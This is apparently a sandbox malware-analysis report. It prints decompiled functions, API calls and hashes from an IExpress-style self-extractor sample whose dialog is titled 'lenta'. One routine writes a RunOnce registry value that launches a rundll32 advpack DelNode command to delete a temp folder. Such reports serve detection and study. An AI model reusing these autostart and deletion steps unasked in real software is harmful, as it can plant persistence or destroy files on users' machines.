                                                                                                                                                                                                                                            • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                                                                                                                                                                                            • API String ID: 1002816675-2993962200
                                                                                                                                                                                                                                            • Opcode ID: baa3232d30ed279efe2c097a80eb5817db76848747bc735c0b1f5306043885ff
                                                                                                                                                                                                                                            • Instruction ID: 6b7b2a6e9f64d0070fc2772db50cc149d59a7bb154097b19a075b5439455c667
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: baa3232d30ed279efe2c097a80eb5817db76848747bc735c0b1f5306043885ff
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09510670341315ABEB24A7759D4AB3A37A9FB65710F104727F982D53D2EEB88C41C622
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 81%
                                                                                                                                                                                                                                            			E008D34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				struct HWND__* _t35;
                                                                                                                                                                                                                                            				struct HWND__* _t38;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t9 == 0) {
                                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					 *0x8d91d8 = 1;
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					_push(_a4);
                                                                                                                                                                                                                                            					L21:
                                                                                                                                                                                                                                            					EndDialog();
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				_pop(1);
                                                                                                                                                                                                                                            				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                            				if(_t12 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                            					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L19;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t35 = _a4;
                                                                                                                                                                                                                                            					 *0x8d8584 = _t35;
                                                                                                                                                                                                                                            					E008D43D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                            					__eflags =  *0x8d8184; // 0x1
                                                                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetWindowTextA(_t35, "lenta");
                                                                                                                                                                                                                                            					_t17 = CreateThread(0, 0, E008D4FE0, 0, 0, 0x8d8798);
                                                                                                                                                                                                                                            					 *0x8d879c = _t17;
                                                                                                                                                                                                                                            					__eflags = _t17;
                                                                                                                                                                                                                                            					if(_t17 != 0) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						E008D44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t35);
                                                                                                                                                                                                                                            						goto L21;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t23 = _t13 - 1;
                                                                                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 2;
                                                                                                                                                                                                                                            					if(_a12 != 2) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					ResetEvent( *0x8d858c);
                                                                                                                                                                                                                                            					_t38 =  *0x8d8584; // 0x0
                                                                                                                                                                                                                                            					_t25 = E008D44B9(_t38, 0x4b2, 0x8d1140, 0, 0x20, 4);
                                                                                                                                                                                                                                            					__eflags = _t25 - 6;
                                                                                                                                                                                                                                            					if(_t25 == 6) {
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						 *0x8d91d8 = 1;
                                                                                                                                                                                                                                            						SetEvent( *0x8d858c);
                                                                                                                                                                                                                                            						_t39 =  *0x8d879c; // 0x0
                                                                                                                                                                                                                                            						E008D3680(_t39);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t25 - 1;
                                                                                                                                                                                                                                            					if(_t25 == 1) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetEvent( *0x8d858c);
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                            					TerminateThread( *0x8d879c, 0);
                                                                                                                                                                                                                                            					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000), ref: 008D3535
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 008D3541
                                                                                                                                                                                                                                            • ResetEvent.KERNEL32 ref: 008D355F
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(008D1140,00000000,00000020,00000004), ref: 008D3590
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 008D35C7
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 008D35F1
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 008D35F8
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 008D3610
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 008D3617
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 008D3623
                                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 008D3637
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 008D3671
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                            • String ID: lenta
                                                                                                                                                                                                                                            • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                            • Opcode ID: 6777402d5705c2cb4d04b14c4a36f0a97befd3a56efe16eb7044a8272a7fbc93
                                                                                                                                                                                                                                            • Instruction ID: 59e03e43b136e1dc344e5eec0cf297c2f0c7ee01b66753df03137453f3bef939
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6777402d5705c2cb4d04b14c4a36f0a97befd3a56efe16eb7044a8272a7fbc93
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35318EB1242301BBDB241F25FC4DE2A3B79F799B51F24472BF612D53A0CB758A00DA56
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                                            			E008D4224(char __ecx) {
                                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				char* _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				char* _t61;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				char* _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                                            				char _t76;
                                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t67 = __ecx;
                                                                                                                                                                                                                                            				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                            				if(_t66 == 0) {
                                                                                                                                                                                                                                            					_t63 = 0x4c2;
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					E008D44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                            				_v12 = _t26;
                                                                                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t63 = 0x4c1;
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                            				_v20 = _t28;
                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                            				_v16 = _t29;
                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t76 =  *0x8d88c0; // 0x0
                                                                                                                                                                                                                                            				if(_t76 != 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					 *0x8d87a0 = 0;
                                                                                                                                                                                                                                            					_v52 = _t67;
                                                                                                                                                                                                                                            					_v48 = 0;
                                                                                                                                                                                                                                            					_v44 = 0;
                                                                                                                                                                                                                                            					_v40 = 0x8d8598;
                                                                                                                                                                                                                                            					_v36 = 1;
                                                                                                                                                                                                                                            					_v32 = E008D4200;
                                                                                                                                                                                                                                            					_v28 = 0x8d88c0;
                                                                                                                                                                                                                                            					 *0x8da288( &_v52);
                                                                                                                                                                                                                                            					_t32 =  *_v12();
                                                                                                                                                                                                                                            					if(_t71 != _t71) {
                                                                                                                                                                                                                                            						asm("int 0x29");
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_v12 = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						 *0x8da288(_t32, 0x8d88c0);
                                                                                                                                                                                                                                            						 *_v16();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *0x8d88c0 != 0) {
                                                                                                                                                                                                                                            							E008D1680(0x8d87a0, 0x104, 0x8d88c0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x8da288(_v12);
                                                                                                                                                                                                                                            						 *_v20();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t85 =  *0x8d87a0; // 0x0
                                                                                                                                                                                                                                            					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					GetTempPathA(0x104, 0x8d88c0);
                                                                                                                                                                                                                                            					_t61 = 0x8d88c0;
                                                                                                                                                                                                                                            					_t4 =  &(_t61[1]); // 0x8d88c1
                                                                                                                                                                                                                                            					_t65 = _t4;
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t42 =  *_t61;
                                                                                                                                                                                                                                            						_t61 =  &(_t61[1]);
                                                                                                                                                                                                                                            					} while (_t42 != 0);
                                                                                                                                                                                                                                            					_t5 = _t61 - _t65 + 0x8d88c0; // 0x11b1181
                                                                                                                                                                                                                                            					_t44 = CharPrevA(0x8d88c0, _t5);
                                                                                                                                                                                                                                            					_v8 = _t44;
                                                                                                                                                                                                                                            					if( *_t44 == 0x5c &&  *(CharPrevA(0x8d88c0, _t44)) != 0x3a) {
                                                                                                                                                                                                                                            						 *_v8 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                            0x008d4285
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d428d
                                                                                                                                                                                                                                            0x008d4293
                                                                                                                                                                                                                                            0x008d42e6
                                                                                                                                                                                                                                            0x008d42e9
                                                                                                                                                                                                                                            0x008d42ef
                                                                                                                                                                                                                                            0x008d42f4
                                                                                                                                                                                                                                            0x008d42f7
                                                                                                                                                                                                                                            0x008d4300
                                                                                                                                                                                                                                            0x008d4307
                                                                                                                                                                                                                                            0x008d430e
                                                                                                                                                                                                                                            0x008d4315
                                                                                                                                                                                                                                            0x008d431c
                                                                                                                                                                                                                                            0x008d4322
                                                                                                                                                                                                                                            0x008d4326
                                                                                                                                                                                                                                            0x008d432d
                                                                                                                                                                                                                                            0x008d432d
                                                                                                                                                                                                                                            0x008d432f
                                                                                                                                                                                                                                            0x008d4334
                                                                                                                                                                                                                                            0x008d4343
                                                                                                                                                                                                                                            0x008d4349
                                                                                                                                                                                                                                            0x008d434d
                                                                                                                                                                                                                                            0x008d4354
                                                                                                                                                                                                                                            0x008d4354
                                                                                                                                                                                                                                            0x008d435d
                                                                                                                                                                                                                                            0x008d436e
                                                                                                                                                                                                                                            0x008d436e
                                                                                                                                                                                                                                            0x008d437d
                                                                                                                                                                                                                                            0x008d4383
                                                                                                                                                                                                                                            0x008d4387
                                                                                                                                                                                                                                            0x008d438e
                                                                                                                                                                                                                                            0x008d438e
                                                                                                                                                                                                                                            0x008d4387
                                                                                                                                                                                                                                            0x008d4391
                                                                                                                                                                                                                                            0x008d4399
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4295
                                                                                                                                                                                                                                            0x008d429f
                                                                                                                                                                                                                                            0x008d42a5
                                                                                                                                                                                                                                            0x008d42aa
                                                                                                                                                                                                                                            0x008d42aa
                                                                                                                                                                                                                                            0x008d42ad
                                                                                                                                                                                                                                            0x008d42ad
                                                                                                                                                                                                                                            0x008d42af
                                                                                                                                                                                                                                            0x008d42b0
                                                                                                                                                                                                                                            0x008d42b6
                                                                                                                                                                                                                                            0x008d42c2
                                                                                                                                                                                                                                            0x008d42c8
                                                                                                                                                                                                                                            0x008d42ce
                                                                                                                                                                                                                                            0x008d42e4
                                                                                                                                                                                                                                            0x008d42e4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d42ce

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 008D4236
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 008D424C
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,000000C3), ref: 008D4263
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 008D427A
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,008D88C0,?,00000001), ref: 008D429F
                                                                                                                                                                                                                                            • CharPrevA.USER32(008D88C0,011B1181,?,00000001), ref: 008D42C2
                                                                                                                                                                                                                                            • CharPrevA.USER32(008D88C0,00000000,?,00000001), ref: 008D42D6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 008D4391
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 008D43A5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                            • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                            • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                            • Opcode ID: 5e52d76f469cd442be8a59de8d4b6008f78286214eab3f96f60079da5ffc5618
                                                                                                                                                                                                                                            • Instruction ID: 9718a3c7ff2526b55b81afaaeb862cc369d97f1c6691b5b3d92e7d3721aa0ff0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e52d76f469cd442be8a59de8d4b6008f78286214eab3f96f60079da5ffc5618
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7941E074A01244EFDB15ABB9DC88AAE7BB4FB49344F28136BE941E3391CB748C05C761
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E008D2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v269;
                                                                                                                                                                                                                                            				CHAR* _v276;
                                                                                                                                                                                                                                            				int _v280;
                                                                                                                                                                                                                                            				void* _v284;
                                                                                                                                                                                                                                            				int _v288;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				int _t45;
                                                                                                                                                                                                                                            				int* _t50;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				CHAR* _t61;
                                                                                                                                                                                                                                            				char* _t62;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            
    _t52 = __ecx;
    _t23 =  *0x8d8004; // 0x12cb0cef
    _v8 = _t23 ^ _t65;
    _t62 = _a4;
    _t50 = 0;
    _t61 = __ecx;
    _v276 = _t62;
     *((char*)(__ecx)) = 0;
    if( *_t62 != 0x23) {
        _t63 = 0x104;
        goto L14;
    } else {
        _t64 = _t62 + 1;
        _v269 = CharUpperA( *_t64);
        _v276 = CharNextA(CharNextA(_t64));
        _t63 = 0x104;
        _t34 = _v269;
        if(_t34 == 0x53) {
            L14:
            GetSystemDirectoryA(_t61, _t63);
            goto L15;
        } else {
            if(_t34 == 0x57) {
                GetWindowsDirectoryA(_t61, 0x104);
                goto L16;
            } else {
                _push(_t52);
                _v288 = 0x104;
                E008D1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                _t59 = 0x104;
                E008D658A( &_v268, 0x104, _v276);
                if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                    L16:
                    _t59 = _t63;
                    E008D658A(_t61, _t63, _v276);
                } else {
                    if(RegQueryValueExA(_v284, 0x8d1140, 0,  &_v280, _t61,  &_v288) == 0) {
                        _t45 = _v280;
                        if(_t45 != 2) {
                            L9:
                            if(_t45 == 1) {
                                goto L10;
                            }
                        } else {
                            if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                _t45 = _v280;
                                goto L9;
                            } else {
                                _t59 = 0x104;
                                E008D1680(_t61, 0x104,  &_v268);
                                L10:
                                _t50 = 1;
                            }
                        }
                    }
                    RegCloseKey(_v284);
                    L15:
                    if(_t50 == 0) {
                        goto L16;
                    }
                }
            }
        }
    }
    return E008D6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
}


APIs
• CharUpperA.USER32(12CB0CEF,00000000,00000000,00000000), ref: 008D27A8
• CharNextA.USER32(0000054D), ref: 008D27B5
• CharNextA.USER32(00000000), ref: 008D27BC
• RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008D2829
• RegQueryValueExA.ADVAPI32(?,008D1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008D2852
• ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008D2870
• RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008D28A0
• GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 008D28AA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 008D28B9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 008D27E4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                            • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                            • Opcode ID: 96be1d58c30e8466ad1f60a5d55b8c9dddabeea09d43f79563ff5f4317d6167f
                                                                                                                                                                                                                                            • Instruction ID: 93d3226a4455a7c67aa36d6f06dae70918b13fb2c1c4b4ebad175535d95daeae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96be1d58c30e8466ad1f60a5d55b8c9dddabeea09d43f79563ff5f4317d6167f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3418071A0012CAFDB249B64DC85AFAB7BDFF65710F1042ABF549D2210DB708E859FA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                                                                                            			E008D2267() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v836;
                                                                                                                                                                                                                                            				void* _v840;
                                                                                                                                                                                                                                            				int _v844;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t42;
                                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t19 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				if( *0x8d8530 != 0) {
                                                                                                                                                                                                                                            					_push(_t49);
                                                                                                                                                                                                                                            					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                            						_push(_t38);
                                                                                                                                                                                                                                            						_v844 = 0x238;
                                                                                                                                                                                                                                            						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                            							_push(_t47);
                                                                                                                                                                                                                                            							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            								E008D658A( &_v268, 0x104, 0x8d1140);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            							E008D171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                            							_t42 =  &_v836;
                                                                                                                                                                                                                                            							_t45 = _t42 + 1;
                                                                                                                                                                                                                                            							_pop(_t47);
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t33 =  *_t42;
                                                                                                                                                                                                                                            								_t42 = _t42 + 1;
                                                                                                                                                                                                                                            							} while (_t33 != 0);
                                                                                                                                                                                                                                            							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                            						_pop(_t38);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_pop(_t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 008D22A3
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 008D22D8
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 008D22F5
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 008D2305
                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 008D236E
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 008D237A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 008D232D
